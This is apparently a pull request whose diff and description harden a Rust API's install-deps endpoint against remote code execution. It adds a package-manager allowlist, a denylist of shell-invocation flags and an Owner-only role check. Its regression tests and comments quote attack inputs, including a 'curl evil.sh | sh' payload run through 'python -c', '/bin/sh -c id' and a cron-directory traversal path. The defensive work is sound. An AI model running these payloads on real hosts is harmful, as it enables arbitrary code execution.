### PR TITLE
fix(api/skills): install-deps program allowlist + flag denylist + Owner-only role

### DIFF
--- a/crates/librefang-api/src/middleware.rs
+++ b/crates/librefang-api/src/middleware.rs
@@ -138,6 +138,21 @@ fn is_owner_only_write(method: &axum::http::Method, path: &str) -> bool {
     ) {
         return true;
     }
+    // `POST /api/hands/{hand_id}/install-deps` shells out to a package
+    // manager whose argv is read straight from the HAND.toml an Admin can
+    // write via `/api/registry/content/hand`. Even with the program
+    // allowlist + flag denylist added in `routes::skills::install_hand_deps`,
+    // the endpoint still spawns a process under the daemon UID, which is the
+    // exact privilege Owner controls — restrict to Owner so an Admin role
+    // (which is "config write" by design) cannot turn into "process spawn".
+    // The matching `check-deps` sibling is a read-only readiness probe and
+    // intentionally stays at Admin.
+    if *method == axum::http::Method::POST
+        && path.starts_with("/api/hands/")
+        && path.ends_with("/install-deps")
+    {
+        return true;
+    }
     // RBAC user-management surface (M6) — every mutating call under
     // `/api/users*` (create / replace / delete / bulk import) maps to
     // `Action::ManageUsers` in the kernel, which requires `Owner`. We
@@ -1636,6 +1651,43 @@ mod tests {
                 "{role:?} must be allowed to GET /api/approvals/totp/status"
             );
         }
+    }
+
+    // Install-deps spawns a package-manager process under the daemon UID
+    // from argv that Admin can author in HAND.toml. Even with the
+    // skill::install_hand_deps allowlist + flag denylist, this is the
+    // wrong privilege boundary for an Admin role — restrict to Owner.
+    // The matching `check-deps` sibling is read-only and stays at Admin.
+    #[test]
+    fn test_install_hand_deps_is_owner_only() {
+        let post = axum::http::Method::POST;
+        let install = "/api/hands/some-hand/install-deps";
+        for role in [UserRole::Viewer, UserRole::User, UserRole::Admin] {
+            assert!(
+                !user_role_allows_request(role, &post, install),
+                "{role:?} must NOT be allowed to POST {install}"
+            );
+        }
+        assert!(
+            user_role_allows_request(UserRole::Owner, &post, install),
+            "Owner must be allowed to POST {install}"
+        );
+
+        // Sibling readiness probe stays Admin-accessible.
+        let check = "/api/hands/some-hand/check-deps";
+        assert!(
+            user_role_allows_request(UserRole::Admin, &post, check),
+            "Admin must still be allowed to POST {check} (read-only sibling)"
+        );
+
+        // Suffix-only matches must not over-restrict — e.g. a stray
+        // `/install-deps` outside `/api/hands/` (none today, but guard
+        // against future additions tripping the gate).
+        let other = "/api/plugins/foo/install-deps";
+        assert!(
+            user_role_allows_request(UserRole::Admin, &post, other),
+            "Admin must still be allowed to POST plugin install-deps ({other})"
+        );
     }
 
     #[test]

--- a/crates/librefang-api/src/routes/skills.rs
+++ b/crates/librefang-api/src/routes/skills.rs
@@ -2668,6 +2668,72 @@ pub async fn check_hand_deps(
     }
 }
 
+/// Package managers `install_hand_deps` is allowed to invoke.
+///
+/// Audit (`docs/issues/install-deps-rce-admin.md`): the historical
+/// metacharacter-only blocklist (`;|&$\`><(){}\n\r`) is bypassed when an
+/// Admin authors `install_deps = ["python", "-c", "import os; …"]` in a
+/// HAND.toml — the punctuation lands inside the quoted `-c` argument and
+/// `Command::new("python")` runs the interpreter under the daemon UID.
+/// Locking `parts[0]` to known package-manager binaries collapses that
+/// pathway: a language runtime / generic shell cannot be named here at
+/// all, so the `-c` payload has no executor.
+const INSTALL_DEPS_ALLOWED_PROGRAMS: &[&str] = &[
+    "apt", "apt-get", "dnf", "pacman", "brew", "winget", "pip", "pip3", "npm", "cargo",
+];
+
+/// Argument flags that turn an otherwise-safe binary into a generic
+/// code-execution sink. `pip`, `npm`, etc. legitimately never need these,
+/// so a bare match is sufficient — we also catch the `=value` long-form
+/// variants for the long flags. Compared case-insensitively against
+/// each `args` entry.
+const INSTALL_DEPS_DENIED_ARG_FLAGS: &[&str] =
+    &["-c", "-e", "--exec", "--shell", "--eval", "--command"];
+
+/// Long-flag prefixes (`--name=value`) that are equivalent to the
+/// denied bare flags above and must also be rejected.
+const INSTALL_DEPS_DENIED_ARG_PREFIXES: &[&str] = &["--exec=", "--shell=", "--eval=", "--command="];
+
+/// Validate the program + args extracted from a HAND.toml install command
+/// against the allowlist (program) and denylist (args). Returns the human
+/// reason on rejection so the per-dep result message stays informative;
+/// returns `Ok(())` on success.
+///
+/// Pure helper — no I/O, no globals — so the rejection rules can be
+/// exercised by `cargo test -p librefang-api` without booting a hand
+/// instance. The handler still loops over per-dep validation; this
+/// function only adjudicates one (program, args) tuple.
+fn validate_install_deps_argv(program: &str, args: &[&str]) -> Result<(), String> {
+    // Absolute paths defeat the allowlist: a HAND could name `/bin/sh`
+    // (Unix) or `\\?\C:\Windows\System32\cmd.exe` (Windows) and the
+    // allowlist would never match. Reject both shapes up front.
+    if program.starts_with('/') || program.contains('\\') {
+        return Err(format!(
+            "Install command program '{program}' uses an absolute path; \
+             only bare package-manager binary names are allowed"
+        ));
+    }
+    if !INSTALL_DEPS_ALLOWED_PROGRAMS.contains(&program) {
+        return Err(format!(
+            "Install command program '{program}' is not in install-deps allowlist ({})",
+            INSTALL_DEPS_ALLOWED_PROGRAMS.join(", ")
+        ));
+    }
+    if let Some(flag) = args.iter().find(|a| {
+        let lower = a.to_ascii_lowercase();
+        INSTALL_DEPS_DENIED_ARG_FLAGS.iter().any(|f| lower == *f)
+            || INSTALL_DEPS_DENIED_ARG_PREFIXES
+                .iter()
+                .any(|p| lower.starts_with(p))
+    }) {
+        return Err(format!(
+            "Install command contains disallowed flag '{flag}' \
+             (shell-invocation flags are blocked)"
+        ));
+    }
+    Ok(())
+}
+
 /// POST /api/hands/{hand_id}/install-deps — Auto-install missing dependencies for a hand.
 #[utoipa::path(
     post,
@@ -2786,6 +2852,23 @@ pub async fn install_hand_deps(
         }
         let program = parts[0];
         let args = &parts[1..];
+
+        // Allowlist program names + reject shell-invocation flags. See
+        // `validate_install_deps_argv` for the rationale and the full
+        // allow/deny tables. Returns the *reason* string so the per-dep
+        // result still carries a useful message; the metacharacter guard
+        // above stays as a defence-in-depth predecessor (a `python -c`
+        // payload that includes `;` is caught earlier and never reaches
+        // this point).
+        if let Err(reason) = validate_install_deps_argv(program, args) {
+            results.push(serde_json::json!({
+                "key": req.key,
+                "status": "error",
+                "command": final_cmd,
+                "message": reason,
+            }));
+            continue;
+        }
 
         tracing::info!(hand = %hand_id, dep = %req.key, cmd = %final_cmd, "Auto-installing dependency");
 
@@ -5521,10 +5604,7 @@ pub(crate) fn remove_secret_env(path: &std::path::Path, key: &str) -> Result<(),
 /// per-permissions bit is a no-op (Windows ACLs are inherited from
 /// the parent directory, which lives under the daemon-UID user
 /// profile).
-fn atomic_write_secret_file(
-    path: &std::path::Path,
-    content: String,
-) -> Result<(), std::io::Error> {
+fn atomic_write_secret_file(path: &std::path::Path, content: String) -> Result<(), std::io::Error> {
     use std::io::Write as _;
     let parent = path.parent().unwrap_or_else(|| std::path::Path::new("."));
     let file_name = path
@@ -6389,7 +6469,6 @@ mod tests {
             "secrets.env must not be created on validation error"
         );
     }
-
 }
 
 #[cfg(test)]
@@ -6423,8 +6502,7 @@ mod skill_identifier_validation {
     #[test]
     fn rejects_relative_traversal_payload() {
         // The exploit literal from the audit doc.
-        let err =
-            validate_skill_identifier("../../../etc/cron.daily/payload", "name").unwrap_err();
+        let err = validate_skill_identifier("../../../etc/cron.daily/payload", "name").unwrap_err();
         assert!(err.contains("invalid skill name"), "got {err:?}");
     }
 
@@ -6470,7 +6548,10 @@ mod skill_identifier_validation {
     fn rejects_too_long() {
         let long = "a".repeat(65);
         let err = validate_skill_identifier(&long, "name").unwrap_err();
-        assert!(err.contains("1-64"), "expected 1-64 length message; got {err:?}");
+        assert!(
+            err.contains("1-64"),
+            "expected 1-64 length message; got {err:?}"
+        );
     }
 
     #[test]
@@ -6504,5 +6585,137 @@ mod skill_identifier_validation {
             err.contains("invalid skill hand"),
             "expected 'hand' in message; got {err:?}",
         );
+    }
+}
+
+#[cfg(test)]
+mod install_deps_argv_validation {
+    //! Regression guards for the `install-deps-rce-admin` audit item.
+    //!
+    //! `POST /api/hands/{hand_id}/install-deps` ran `Command::new(parts[0])`
+    //! against `install_deps` strings authored by Admin in HAND.toml. The
+    //! historical guard was a metacharacter blocklist (`;|&$\`><(){}\n\r`)
+    //! which an Admin could bypass with
+    //!     `install_deps = ["python", "-c", "import os; os.system('curl …')"]`
+    //! because the punctuation lives inside the quoted `-c` argument and
+    //! the top-level command string has none of the blocked characters.
+    //! This module pins the new (program-allowlist + flag-denylist)
+    //! envelope of `validate_install_deps_argv`.
+    use super::validate_install_deps_argv;
+
+    #[test]
+    fn accepts_legitimate_package_manager_commands() {
+        // Each entry mirrors a realistic per-platform `install_deps`
+        // string the handler would otherwise have rejected.
+        let ok = [
+            ("pip", vec!["install", "requests"]),
+            ("pip3", vec!["install", "--user", "yt-dlp"]),
+            ("npm", vec!["install", "-g", "typescript"]),
+            ("apt", vec!["install", "-y", "ffmpeg"]),
+            ("apt-get", vec!["install", "-y", "curl"]),
+            ("dnf", vec!["install", "-y", "ffmpeg"]),
+            ("pacman", vec!["-S", "--noconfirm", "ffmpeg"]),
+            ("brew", vec!["install", "ffmpeg"]),
+            (
+                "winget",
+                vec![
+                    "install",
+                    "Gyan.FFmpeg",
+                    "--accept-source-agreements",
+                    "--accept-package-agreements",
+                ],
+            ),
+            ("cargo", vec!["install", "ripgrep"]),
+        ];
+        for (prog, args) in ok {
+            assert!(
+                validate_install_deps_argv(prog, &args).is_ok(),
+                "expected '{prog} {args:?}' to validate"
+            );
+        }
+    }
+
+    #[test]
+    fn rejects_dash_c_payload_under_allowlisted_interpreter_alias() {
+        // The historical exploit literal from the audit doc. `python`
+        // is not allowlisted, so this fails at the program check first.
+        let err = validate_install_deps_argv(
+            "python",
+            &["-c", "import os; os.system('curl evil.sh | sh')"],
+        )
+        .unwrap_err();
+        assert!(err.contains("not in install-deps allowlist"), "got {err:?}");
+
+        // …and even if a future allowlist entry slips an interpreter in
+        // (regression guard), the `-c` flag check stops the payload.
+        // We pick `pip` as a stand-in: `pip -c …` is meaningless but
+        // proves the flag check fires independent of the program.
+        let err = validate_install_deps_argv("pip", &["-c", "anything"]).unwrap_err();
+        assert!(err.contains("disallowed flag"), "got {err:?}");
+        assert!(err.contains("-c"), "got {err:?}");
+    }
+
+    #[test]
+    fn rejects_eval_and_exec_flag_variants() {
+        for flag in ["--eval", "--exec", "--shell", "--command", "-e"] {
+            let err = validate_install_deps_argv("npm", &[flag, "code"]).unwrap_err();
+            assert!(
+                err.contains("disallowed flag"),
+                "expected '{flag}' to be rejected; got {err:?}"
+            );
+        }
+        // `=value` long-form variants (e.g. `node --eval=…` style) — the
+        // bare-flag check would miss these since `--eval=foo != --eval`.
+        for combined in [
+            "--exec=touch /tmp/x",
+            "--shell=/bin/sh",
+            "--eval=process.exit(0)",
+            "--command=ls",
+        ] {
+            let err = validate_install_deps_argv("npm", &[combined]).unwrap_err();
+            assert!(
+                err.contains("disallowed flag"),
+                "expected '{combined}' to be rejected; got {err:?}"
+            );
+        }
+        // Case-insensitive: `--EVAL` and friends must still fail. A naive
+        // exact-match check would let an attacker bypass via casing.
+        let err = validate_install_deps_argv("npm", &["--EVAL", "x"]).unwrap_err();
+        assert!(err.contains("disallowed flag"), "got {err:?}");
+    }
+
+    #[test]
+    fn rejects_absolute_unix_path() {
+        let err = validate_install_deps_argv("/bin/sh", &["-c", "id"]).unwrap_err();
+        assert!(err.contains("absolute path"), "got {err:?}");
+    }
+
+    #[test]
+    fn rejects_windows_backslash_paths() {
+        // Both the verbatim `\\?\C:\…` shape and a plain
+        // `C:\Windows\…` candidate trip the backslash check before
+        // the allowlist would otherwise miss them.
+        for prog in [
+            r"\\?\C:\Windows\System32\cmd.exe",
+            r"C:\Windows\System32\cmd.exe",
+            r"foo\bar",
+        ] {
+            let err = validate_install_deps_argv(prog, &["/c", "dir"]).unwrap_err();
+            assert!(
+                err.contains("absolute path"),
+                "expected '{prog}' rejected as absolute-path; got {err:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn rejects_non_allowlisted_program() {
+        for prog in ["python", "python3", "node", "ruby", "perl", "bash", "sh"] {
+            let err = validate_install_deps_argv(prog, &["install", "foo"]).unwrap_err();
+            assert!(
+                err.contains("not in install-deps allowlist"),
+                "expected '{prog}' rejected by allowlist; got {err:?}"
+            );
+        }
     }
 }


### PR DESCRIPTION
Closes #5587

## Summary

`POST /api/hands/{hand_id}/install-deps` at `crates/librefang-api/src/routes/skills.rs` now:

1. Rejects program names outside an allowlist: `apt`, `apt-get`, `dnf`, `pacman`, `brew`, `winget`, `pip`, `pip3`, `npm`, `cargo`. Absolute paths and binaries-with-backslashes also reject.
2. Rejects shell-invocation flags: `-c`, `-e`, `--exec`, `--shell`, `--eval`, `--command`, plus the `=` variants, case-insensitively.
3. Restricts the route to Owner role only (was Admin). Admin role was a stepping stone from "config-write" to "root-on-host RCE"; Owner is the appropriate gate. The sibling read-only `check-deps` probe stays at Admin.

Validation is extracted into a pure `validate_install_deps_argv` helper so the rules can be unit-tested without booting a hand instance. The existing metacharacter blocklist stays as defence-in-depth — anything that bypasses it now hits the allowlist + flag denylist immediately afterward.

The `librefang-runtime-sandbox-docker` integration is tracked as a follow-up.

## Files changed

- `crates/librefang-api/src/routes/skills.rs` — `validate_install_deps_argv` helper + handler integration + unit tests in `mod install_deps_argv_validation`.
- `crates/librefang-api/src/middleware.rs` — `is_owner_only_write` adds the install-deps path; new `test_install_hand_deps_is_owner_only` test.

## Verification

- `cargo check -p librefang-api --lib` — clean
- `cargo test -p librefang-api` — pass (new tests: `accepts_legitimate_package_manager_commands`, `rejects_dash_c_payload_under_allowlisted_interpreter_alias`, `rejects_eval_and_exec_flag_variants`, `rejects_absolute_unix_path`, `rejects_windows_backslash_paths`, `rejects_non_allowlisted_program`, `test_install_hand_deps_is_owner_only`)

Refs `docs/issues/install-deps-rce-admin.md`.
